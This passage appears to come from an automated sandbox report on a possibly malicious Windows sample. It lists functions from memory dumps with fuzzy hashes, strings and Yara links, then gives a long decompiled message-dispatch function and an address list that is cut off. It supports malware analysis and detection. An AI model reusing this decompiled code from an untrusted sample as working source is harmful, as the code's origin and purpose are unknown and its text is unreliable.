Instruction Fuzzy Hash: B2614671108301AFC744DF26C88982BBBE1FBC5758F408A2DF595A6220D3B5DA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 048C6FC4, Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

)w', xrefs: 048C707C
w^, xrefs: 048C703C

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: )w'$w^
API String ID: 0-882844667
Opcode ID: 2ffd9d3d6f170c2214dbe814d0ce227cd3553b19ed2464a9f138930d33f2ff89
Instruction ID: 9c067669c5c1382f45ce97808156644304c9e9af2b6159e932e476b2c68e4535
Opcode Fuzzy Hash: 2ffd9d3d6f170c2214dbe814d0ce227cd3553b19ed2464a9f138930d33f2ff89
Instruction Fuzzy Hash: 896148715083429BD358CE25C48981BFBE2FBD8758F104E1EF596A6260D3B5DA098F87

Uniqueness

Uniqueness Score: -1.00%

Function 048E25C3, Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

}O, xrefs: 048E262F
"a, xrefs: 048E26FA

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: "a$}O
API String ID: 0-3171921561
Opcode ID: 1cee2ce51eaa199849acd9d2c383c3291d927957ed64d5f41af4c5ed2ba4e0b5
Instruction ID: b79f29a8eb1f9e98c35de5b853e584019acae1d79af6c0c3c0495529acacd34f
Opcode Fuzzy Hash: 1cee2ce51eaa199849acd9d2c383c3291d927957ed64d5f41af4c5ed2ba4e0b5
Instruction Fuzzy Hash: 216132710083019FC358DF29C98982BBBF2FBC9758F405E0DF69996260D7B5DA498B83

Uniqueness

Uniqueness Score: -1.00%

Function 048D748A, Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

5Q, xrefs: 048D764B
9c, xrefs: 048D749C

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 5Q$9c
API String ID: 0-959052616
Opcode ID: c7c099e7a9cb46d1fc3791305ca66a908dad3849150b07a645c997e88d901a8c
Instruction ID: 3f903cede3e59bbd79e3a8ca77b9b4c85debf44518b7f9871e756cb0d47738e4
Opcode Fuzzy Hash: c7c099e7a9cb46d1fc3791305ca66a908dad3849150b07a645c997e88d901a8c
Instruction Fuzzy Hash: D45167B15083419FD398DF25D88680BBBE1FB98758F404E0DF589A6260D3B5DA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 048DB1B5, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

{_, xrefs: 048DB235
r{P, xrefs: 048DB23C

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: r{P${_
API String ID: 0-359611368
Opcode ID: b13479e0b2f08c1888c47a976b9863cdf1bf456e1398041e40de404634815ad5
Instruction ID: ca4e712e876f28a24de5dfe225fdc2bde57234f21d03fa586c45cc47e2d0e9cc
Opcode Fuzzy Hash: b13479e0b2f08c1888c47a976b9863cdf1bf456e1398041e40de404634815ad5
Instruction Fuzzy Hash: D6512171C0121D9BDF09CFA9D98A5EEFBB1FB08318F208199C412B6250D7B51A49CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 048CBFB6, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

&xH, xrefs: 048CC10B
&xH, xrefs: 048CC111

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: &xH$&xH
API String ID: 2591292051-1205046639
Opcode ID: 6263473fc3958d83620d1a66761e2405c2dac933fa2c47d69384aae7458bc16b
Instruction ID: 04a8ee3ab37f5738bada2db981021fbd9f120d87adddd63ab5f01bec3d658418
Opcode Fuzzy Hash: 6263473fc3958d83620d1a66761e2405c2dac933fa2c47d69384aae7458bc16b
Instruction Fuzzy Hash: 7A5125B1E0020DEFDF08CFA9D9469EEBBB6EB44704F208459E514BB250D7B55A51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 048C3345, Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

#3&, xrefs: 048C336D
W, xrefs: 048C33CA

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: #3&$W
API String ID: 0-2325648925
Opcode ID: e7ca1a81854e749666efcbae523c9fd285aa0e7f06aaddc5c8c99673b9781c38
Instruction ID: 06990dc29949fa30a5eb2d468f199487727ae47712180d3e929846bf183e2c6f
Opcode Fuzzy Hash: e7ca1a81854e749666efcbae523c9fd285aa0e7f06aaddc5c8c99673b9781c38
Instruction Fuzzy Hash: 14513E75D01309ABDF19DFA5CA8A4EEBBB1FF08318F20855DC412B6260D3B46A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 048DCCD4, Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

}f-, xrefs: 048DCD2C
5/|, xrefs: 048DCD23

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 5/|$}f-
API String ID: 0-2834218136
Opcode ID: 0940f7b8d7e58c5ad3842be0d7febd7ee8dd47da857396efdfefb5fb9a79c218
Instruction ID: d0729845edfabe3dec8e27d7e076b7c4836998fbe720cab159239931ab65e741
Opcode Fuzzy Hash: 0940f7b8d7e58c5ad3842be0d7febd7ee8dd47da857396efdfefb5fb9a79c218
Instruction Fuzzy Hash: 9931F57290010CBFDF05DFE5DC858EEBFB6FB48348F108159FA14A6260D3B29A509B50

Uniqueness

Uniqueness Score: -1.00%

Function 048C5923, Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

ms, xrefs: 048C59B5
`d, xrefs: 048C597D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: `d$ms
API String ID: 0-1149396387
Opcode ID: 51295cff2af329c84194e7a931f728f3170c24cfdc98843895b9a588b04bdb14
Instruction ID: 726764cdc0f21719bc45f36dc7cfc4107bd588f95007113dc144f54a02a1ed31
Opcode Fuzzy Hash: 51295cff2af329c84194e7a931f728f3170c24cfdc98843895b9a588b04bdb14
Instruction Fuzzy Hash: 7A3189326093119FD704CF28C98545BFBE0EF88618F050BADF989A7251C770EA08CB96

Uniqueness

Uniqueness Score: -1.00%

Function 048C220A, Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

TV1, xrefs: 048C2280
3c, xrefs: 048C22C5

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: TV1$3c
API String ID: 0-3390316800
Opcode ID: 37f292062facc737efc07354ba87213b831a0bcd9870a8fb590c766737d432f5
Instruction ID: 32bce6194b3772ffbd2c98a4025df1e0737848ad75f6085584fe81d7d5be20f9
Opcode Fuzzy Hash: 37f292062facc737efc07354ba87213b831a0bcd9870a8fb590c766737d432f5
Instruction Fuzzy Hash: DF310276D0020CBBDF05CF95C9498DEBBB6FB49354F408198F914A6210D3B69A20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 10010E3B, Relevance: 2.0, APIs: 1, Instructions: 452
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E10010E3B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t156;
				signed int _t158;
				signed int* _t161;
				intOrPtr _t168;
				intOrPtr* _t169;
				signed int _t172;
				signed int _t175;
				signed int* _t179;
				signed int* _t182;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t198;
				signed int _t201;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t222;
				signed int _t226;
				unsigned int _t233;
				void* _t234;

				_t209 = __ecx;
				_push(0x70);
				E10041CAB(0x1005217d, __ebx, __edi, __esi);
				_t231 = __ecx;
				 *((intOrPtr*)(_t234 - 0x10)) = 0;
				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
				_t198 =  *(_t234 + 8);
				 *(_t234 - 4) = 0;
				if(_t198 != 0x111) {
					__eflags = _t198 - 0x4e;
					if(_t198 != 0x4e) {
						_t233 =  *(_t234 + 0x10);
						__eflags = _t198 - 6;
						if(_t198 == 6) {
							E100107F4(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E1000EBE9(_t198, __ecx, _t233));
						}
						__eflags = _t198 - 0x20;
						if(_t198 != 0x20) {
							L12:
							_t156 =  *(_t231 + 0x4c);
							__eflags = _t156;
							if(_t156 == 0) {
								L20:
								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
								 *(_t234 + 0x10) = _t158;
								_t201 = (_t158 ^  *(_t234 + 8)) & 0x000001ff;
								E1000D4E9(_t201, _t234 - 0x14, _t231, _t233, 7);
								_t203 = 0x10092918 + _t201 * 0xc;
								 *(_t234 - 0x18) = _t203;
								__eflags =  *(_t234 + 8) -  *_t203;
								if( *(_t234 + 8) !=  *_t203) {
									L25:
									_t161 =  *(_t234 - 0x18);
									_t204 =  *(_t234 + 0x10);
									 *_t161 =  *(_t234 + 8);
									_t161[2] = _t204;
									while(1) {
										__eflags =  *_t204;
										if( *_t204 == 0) {
											break;
										}
										__eflags =  *(_t234 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t234 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
											while(1) {
												_t205 = E1000CA95();
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
													( *(_t234 - 0x18))[1] = _t205;
													E1000D51D(_t234 - 0x14);
													L113:
													_t206 =  *((intOrPtr*)(_t205 + 0x14));
													L114:
													_push(_t233);
													L115:
													_push( *((intOrPtr*)(_t234 + 0xc)));
													L116:
													_t168 =  *_t206();
													L117:
													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
													goto L118;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t207 = _t205 + 0x18;
												__eflags = _t207;
												_push(_t207);
											}
											_t204 =  *(_t234 + 0x10);
											L36:
											_t204 =  *_t204();
											 *(_t234 + 0x10) = _t204;
											continue;
										}
										_push( *(_t234 + 8));
										_push( *((intOrPtr*)(_t204 + 4)));
										_t175 = E1000CA95();
										 *(_t234 + 0x10) = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L36;
										}
										( *(_t234 - 0x18))[1] = _t175;
										E1000D51D(_t234 - 0x14);
										L29:
										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
										__eflags = _t222 - 0x53;
										if(__eflags > 0) {
											goto L118;
										}
										switch( *((intOrPtr*)(_t222 * 4 +  &M100113FF))) {
											case 0:
												_push(E1000B1CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E1000EBE9(__ebx, __ecx,  *(__ebp + 0xc));
												goto L50;
											case 3:
												_push(__esi);
												__eax = E1000EBE9(__ebx, __ecx,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 5:
												__ecx = __ebp - 0x28;
												E1000AC1B(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E1000D539(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000EC15(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x24;
														__eax = E10028D31(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												_t84 = __ebp - 0x5c;
												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
												__eflags =  *_t84;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E1000F543(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E1000AC1B(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E1000B249(__ecx);
												goto L118;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000EBE9(__ebx, __ecx, __esi);
												goto L62;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L114;
											case 0xa:
												_push(E1001F4AD(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L62:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L50:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0xb:
												_push(__esi);
												goto L110;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L66;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L69;
											case 0xf:
												_push(__esi >> 0x10);
												__eax = __si;
												goto L69;
											case 0x10:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x11:
												__eax = E1000EBE9(__ebx, __ecx, __esi);
												goto L48;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0x13:
												_push(E1000EBE9(__ebx, __ecx,  *(__ebp + 0xc)));
												_push(E1000EBE9(__ebx, __ecx, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
												__eflags = _t112;
												__eax = 0 | _t112;
												goto L75;
											case 0x14:
												__eax = E1000B1CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x15:
												__eax = E1001F4AD(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x16:
												__esi = __esi >> 0x10;
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E1001F4AD(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L75;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												_push(__esi);
												L81:
												__eax = E1000EBE9(__ebx, __ecx);
												L77:
												_push(__eax);
												goto L66;
											case 0x19:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L84;
											case 0x1a:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__ecx);
												L84:
												_push(__eax);
												__eax = E1000EBE9(__ebx, __ecx,  *(__ebp + 0xc));
												goto L75;
											case 0x1b:
												_push(__esi);
												__eax = E1000EBE9(__ebx, __ecx,  *(__ebp + 0xc));
												goto L69;
											case 0x1c:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000EBE9(__ebx, __ecx, __esi);
												goto L88;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												__eflags = __eax - 0x2a;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													goto L111;
												}
												_push(E1000EBE9(__ebx, __ecx, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L73;
											case 0x1e:
												_push(__esi);
												L66:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L116;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L75:
												_push(__eax);
												goto L73;
											case 0x22:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L73:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t194;
												if(_t194 != 0) {
													goto L118;
												}
												goto L39;
											case 0x24:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x25:
												goto L118;
											case 0x26:
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L118;
												}
												L39:
												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
												E1000D51D(_t234 - 0x14);
												_t172 = 0;
												__eflags = 0;
												goto L40;
											case 0x27:
												__eax = E1001F4AD(__ebx, __ecx, __edi, __esi, __eflags, __esi);
												L48:
												_push(__eax);
												L110:
												_push( *(__ebp + 0xc));
												goto L111;
											case 0x28:
												_push(E1001F4AD(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												goto L115;
											case 0x29:
												_push(__esi);
												__eax = E1001F4AD(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L69;
											case 0x2a:
												__ecx = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = __esi;
												__eax = __esi >> 0x10;
												__ecx = __eax;
												__ecx = __eax & 0x0000f000;
												_push(__ecx);
												__eax = __eax & 0x00000fff;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000EBE9(__ebx, __ecx,  *(__ebp + 0xc));
												goto L104;
											case 0x2b:
												__eax =  *(__ebp + 0xc) & 0x000000ff;
												_push(__esi);
												L69:
												_push(__eax);
												L111:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x2c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L104:
												_push(__eax);
												goto L105;
											case 0x2d:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												_push( *(__ebp + 0xc));
												L105:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
										}
									}
									_t179 =  *(_t234 - 0x18);
									_t58 =  &(_t179[1]);
									 *_t58 = _t179[1] & 0x00000000;
									__eflags =  *_t58;
									E1000D51D(_t234 - 0x14);
									goto L39;
								}
								_t182 = _t203;
								__eflags =  *(_t234 + 0x10) - _t182[2];
								if( *(_t234 + 0x10) != _t182[2]) {
									goto L25;
								}
								_t205 = _t182[1];
								 *(_t234 + 0x10) = _t205;
								E1000D51D(_t234 - 0x14);
								__eflags = _t205;
								if(_t205 == 0) {
									goto L39;
								}
								__eflags =  *(_t234 + 8) - 0xc000;
								if( *(_t234 + 8) < 0xc000) {
									goto L29;
								}
								goto L113;
							}
							__eflags =  *(_t156 + 0x74);
							if( *(_t156 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t198 - 0x200;
							if(_t198 < 0x200) {
								L16:
								__eflags = _t198 - 0x100;
								if(_t198 < 0x100) {
									L18:
									__eflags = _t198 - 0x281 - 0x10;
									if(_t198 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
									__eflags = _t186;
									if(_t186 != 0) {
										goto L118;
									}
									goto L20;
								}
								__eflags = _t198 - 0x10f;
								if(_t198 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t198 - 0x209;
							if(_t198 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t190 = E1001086C(_t198, _t231, _t231, _t233, _t233 >> 0x10);
							__eflags = _t190;
							if(_t190 != 0) {
								L2:
								 *((intOrPtr*)(_t234 - 0x10)) = 1;
								L118:
								_t169 =  *((intOrPtr*)(_t234 + 0x14));
								if(_t169 != 0) {
									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
								}
								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
								E1000D51D(_t234 - 0x14);
								_t172 = 1;
								L40:
								return E10041D83(_t172);
							}
							goto L12;
						}
					}
					_t226 =  *(_t234 + 0x10);
					__eflags =  *_t226;
					if( *_t226 == 0) {
						goto L39;
					}
					_push(_t234 - 0x10);
					_push(_t226);
					_push( *((intOrPtr*)(_t234 + 0xc)));
					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
					goto L6;
				}
				_push( *(_t234 + 0x10));
				_push( *((intOrPtr*)(_t234 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x10010e3b
0x10010e3b
0x10010e42
0x10010e47
0x10010e4b
0x10010e4e
0x10010e55
0x10010e58
0x10010e61
0x10010e85
0x10010e88
0x10010eb4
0x10010eb7
0x10010eba
0x10010ec7
0x10010ec7
0x10010ecc
0x10010ecf
0x10010ee5
0x10010ee5
0x10010ee8
0x10010eea
0x10010f39
0x10010f3d
0x10010f4a
0x10010f4d
0x10010f53
0x10010f5e
0x10010f64
0x10010f67
0x10010f69
0x10010f99
0x10010f99
0x10010f9c
0x10010fa2
0x10010fa4
0x10011033
0x10011033
0x10011036
0x00000000
0x00000000
0x10010fac
0x10010fb3
0x10010fb5
0x10010fb7
0x10010ffb
0x10011000
0x1001101e
0x10011023
0x10011025
0x10011027
0x00000000
0x00000000
0x10011009
0x1001100b
0x100113c7
0x100113ca
0x100113cf
0x100113cf
0x100113d2
0x100113d2
0x100113d3
0x100113d3
0x100113d6
0x100113d8
0x100113da
0x100113da
0x00000000
0x100113da
0x10011011
0x10011013
0x10011015
0x1001101a
0x1001101a
0x1001101d
0x1001101d
0x10011029
0x1001102c
0x1001102e
0x10011030
0x00000000
0x10011030
0x10010fb9
0x10010fbc
0x10010fbf
0x10010fc4
0x10010fc7
0x10010fc9
0x00000000
0x00000000
0x10010fce
0x10010fd4
0x10010fd9
0x10010fe2
0x10010fe5
0x10010fe8
0x00000000
0x00000000
0x10010fee
0x00000000
0x10011079
0x00000000
0x00000000
0x10011083
0x00000000
0x00000000
0x1001109d
0x1001109f
0x1001109f
0x100110a2
0x100110a3
0x100110a6
0x100110aa
0x00000000
0x00000000
0x100110b9
0x100110bd
0x00000000
0x00000000
0x100110c4
0x1001107a
0x1001107a
0x1001107c
0x00000000
0x00000000
0x100110c7
0x100110cf
0x100110d2
0x100110d5
0x100110d9
0x100110dc
0x100110e1
0x100110e3
0x100110e7
0x100110eb
0x100110ee
0x100110f3
0x100110f5
0x100110f7
0x100110fa
0x100110fc
0x10011101
0x10011104
0x10011109
0x1001110b
0x1001110d
0x1001110d
0x1001110b
0x10011110
0x10011110
0x10011113
0x10011114
0x10011115
0x10011118
0x10011119
0x1001111b
0x1001111d
0x10011121
0x10011121
0x10011121
0x10011125
0x10011128
0x1001112b
0x1001112f
0x00000000
0x00000000
0x10011145
0x1001114d
0x10011150
0x10011153
0x10011156
0x10011159
0x1001115a
0x1001115c
0x10011160
0x10011162
0x10011166
0x10011134
0x10011134
0x10011137
0x1001113b
0x00000000
0x00000000
0x1001116b
0x1001116e
0x1001116e
0x10011171
0x10011173
0x00000000
0x00000000
0x10011185
0x10011188
0x10011189
0x00000000
0x00000000
0x00000000
0x00000000
0x10011198
0x10011199
0x1001119c
0x10011178
0x10011178
0x10011179
0x100110af
0x100110af
0x100110b0
0x100110b2
0x00000000
0x00000000
0x100113b7
0x00000000
0x00000000
0x100111a1
0x00000000
0x00000000
0x100111ad
0x100111af
0x00000000
0x00000000
0x100111b6
0x100111b9
0x100111b9
0x100111bc
0x100111bd
0x00000000
0x00000000
0x100111cd
0x100111ce
0x00000000
